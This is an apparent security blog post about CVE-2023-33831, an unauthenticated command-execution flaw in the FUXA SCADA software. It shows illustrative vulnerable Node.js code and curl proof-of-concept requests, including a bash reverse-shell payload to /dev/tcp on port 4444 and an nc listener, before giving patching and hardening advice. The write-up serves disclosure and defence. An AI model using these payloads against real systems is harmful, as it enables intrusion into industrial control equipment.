The world of open-source industrial software isn’t always safe. In May 2023, a shocking vulnerability—CVE-2023-33831—was disclosed in FUXA, a popular open-source industrial process visualization and control application. In its 1.1.13 release, a single API endpoint allowed attackers to run any command they wanted, right on the server. This simple, but devastating bug serves as a critical lesson for developers and operators alike.
What is FUXA?
FUXA is a web-based SCADA (Supervisory Control and Data Acquisition) tool for modern automation. Used worldwide, it connects to industrial PLCs, lets teams monitor devices in real time, and automates actions. An insecure deployment of FUXA often sits on the same network as sensitive equipment.
Vulnerability Overview
CVE-2023-33831 is a remote command execution (RCE) flaw. It means an attacker can send a crafted HTTP request to FUXA’s /api/runscript endpoint and make the server execute any shell command. No prior authentication is required.
- Affected product: FUXA (frangoteam/fuxa)
Affected version: 1.1.13 (and possibly earlier)
- Vulnerable endpoint: /api/runscript
Why Does This Happen?
Inside FUXA’s code, the /api/runscript endpoint was designed to let users run scripts on the server. However, no input validation or access control was used. The server simply accepted script commands from the user and ran them with a call to child_process.exec or a similar Node.js function—dangerously naive!
Example vulnerable code
// WARNING: This is insecure code for illustration!
app.post('/api/runscript', function(req, res) {
var userScript = req.body.script;
const { exec } = require('child_process');
exec(userScript, (error, stdout, stderr) => {
if (error) {
return res.status(500).send(error.message);
}
res.send(stdout);
});
});
This code takes whatever an attacker sends in the script field and runs it as a system command, returning the output.
Server running FUXA 1.1.13
- /api/runscript open to the network (default installation)
Craft a malicious POST request:
- Endpoint: http://<victim-server>:1881/api/runscript
Suppose you want to see if the server is vulnerable. You could send
curl -X POST http://victim-ip:1881/api/runscript \
-H "Content-Type: application/json" \
-d '{"script": "id"}'
This command would return the UID and group details of the user running FUXA.
Imagine you want full remote access. You could send
curl -X POST http://victim-ip:1881/api/runscript \
-H "Content-Type: application/json" \
-d '{"script": "bash -c '\''bash -i >& /dev/tcp/<your-ip>/4444 >&1'\''"}'
Set up a netcat listener on your own machine
nc -lvnp 4444
If vulnerable, the server connects back to you, and you obtain a shell.
References
- NIST NVD Advisory for CVE-2023-33831
- FUXA GitHub repository (see issues & pull requests)
- Packet Storm Security disclosure
- Exploit Database #51423
Immediate Steps
- Update FUXA Immediately: Version 1.1.14 and later include a fix for the vulnerability. Upgrade now!
Restrict Access: Never expose FUXA to the public internet. Use firewalls and VPNs.
- Disable or Remove /api/runscript: If you don’t need this feature, comment it out in code or disable it in the config.
Takeaway
CVE-2023-33831 is a textbook example of why strong validation and access controls matter in industrial software. Once attackers get RCE, it’s already too late—patch before that happens. Monitor your systems, lock down your network, and never trust user input blindly.
Don’t let your automation system become an attacker’s playground. Patch, audit, and defend—today.
If you found this analysis helpful, consider following FUXA’s security page for updates. For reference, always consult the official NVD entry for CVE-2023-33831.
Timeline
Published on: 09/18/2023 20:15:00 UTC
Last modified on: 09/19/2023 21:24:00 UTC